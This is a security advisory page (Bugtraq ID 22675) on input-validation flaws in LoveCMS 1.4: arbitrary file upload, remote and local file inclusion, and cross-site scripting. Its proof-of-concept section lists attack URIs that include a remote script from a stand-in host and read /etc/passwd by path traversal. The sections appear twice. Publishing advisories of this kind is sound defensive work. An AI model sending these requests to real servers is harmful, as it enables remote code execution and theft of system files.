LoveCMS Multiple Input Validation Vulnerabilities
BID:22675
Info
LoveCMS Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 22675 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-1149 CVE-2007-1150 CVE-2007-1148 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 22 2007 12:00AM |
| Updated: | Jul 06 2016 02:40PM |
| Credit: | laurent gaffie is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
LoveCMS LoveCMS 1.4 |
| Not Vulnerable: | |
Discussion
LoveCMS Multiple Input Validation Vulnerabilities
LoveCMS is prone to multiple input-validation vulnerabilities, including an arbitrary-file-upload issue, a remote file-include issue, a local file-include issue, and a cross-site scripting issue.
An attacker can exploit these issues to steal cookie-based authentication credentials, upload an arbitrary PHP file, execute the file on the vulnerable computer in the context of the webserver process, retrieve arbitrary files from the vulnerable system in the context of the affected application, and delete arbitrary files on the server.
LoveCMS is prone to multiple input-validation vulnerabilities, including an arbitrary-file-upload issue, a remote file-include issue, a local file-include issue, and a cross-site scripting issue.
An attacker can exploit these issues to steal cookie-based authentication credentials, upload an arbitrary PHP file, execute the file on the vulnerable computer in the context of the webserver process, retrieve arbitrary files from the vulnerable system in the context of the affected application, and delete arbitrary files on the server.
Exploit / POC
LoveCMS Multiple Input Validation Vulnerabilities
Attackers can exploit these issues via a web client.
The following proof-of-concept URIs are available:
http://www.example.com/lovecms/install/index.php?step=http://example2.com/boum.txt?
http://www.example.com/lovecms/install/index.php?step=/etc/passwd%00
http://www.example.com//ovecms/?load=../../../../../../../../../../etc/passwd%00
http://www.example.com/lovecms/?load=content&id=[xss]
Attackers can exploit these issues via a web client.
The following proof-of-concept URIs are available:
http://www.example.com/lovecms/install/index.php?step=http://example2.com/boum.txt?
http://www.example.com/lovecms/install/index.php?step=/etc/passwd%00
http://www.example.com//ovecms/?load=../../../../../../../../../../etc/passwd%00
http://www.example.com/lovecms/?load=content&id=[xss]
Solution / Fix
LoveCMS Multiple Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
LoveCMS Multiple Input Validation Vulnerabilities
References:
References: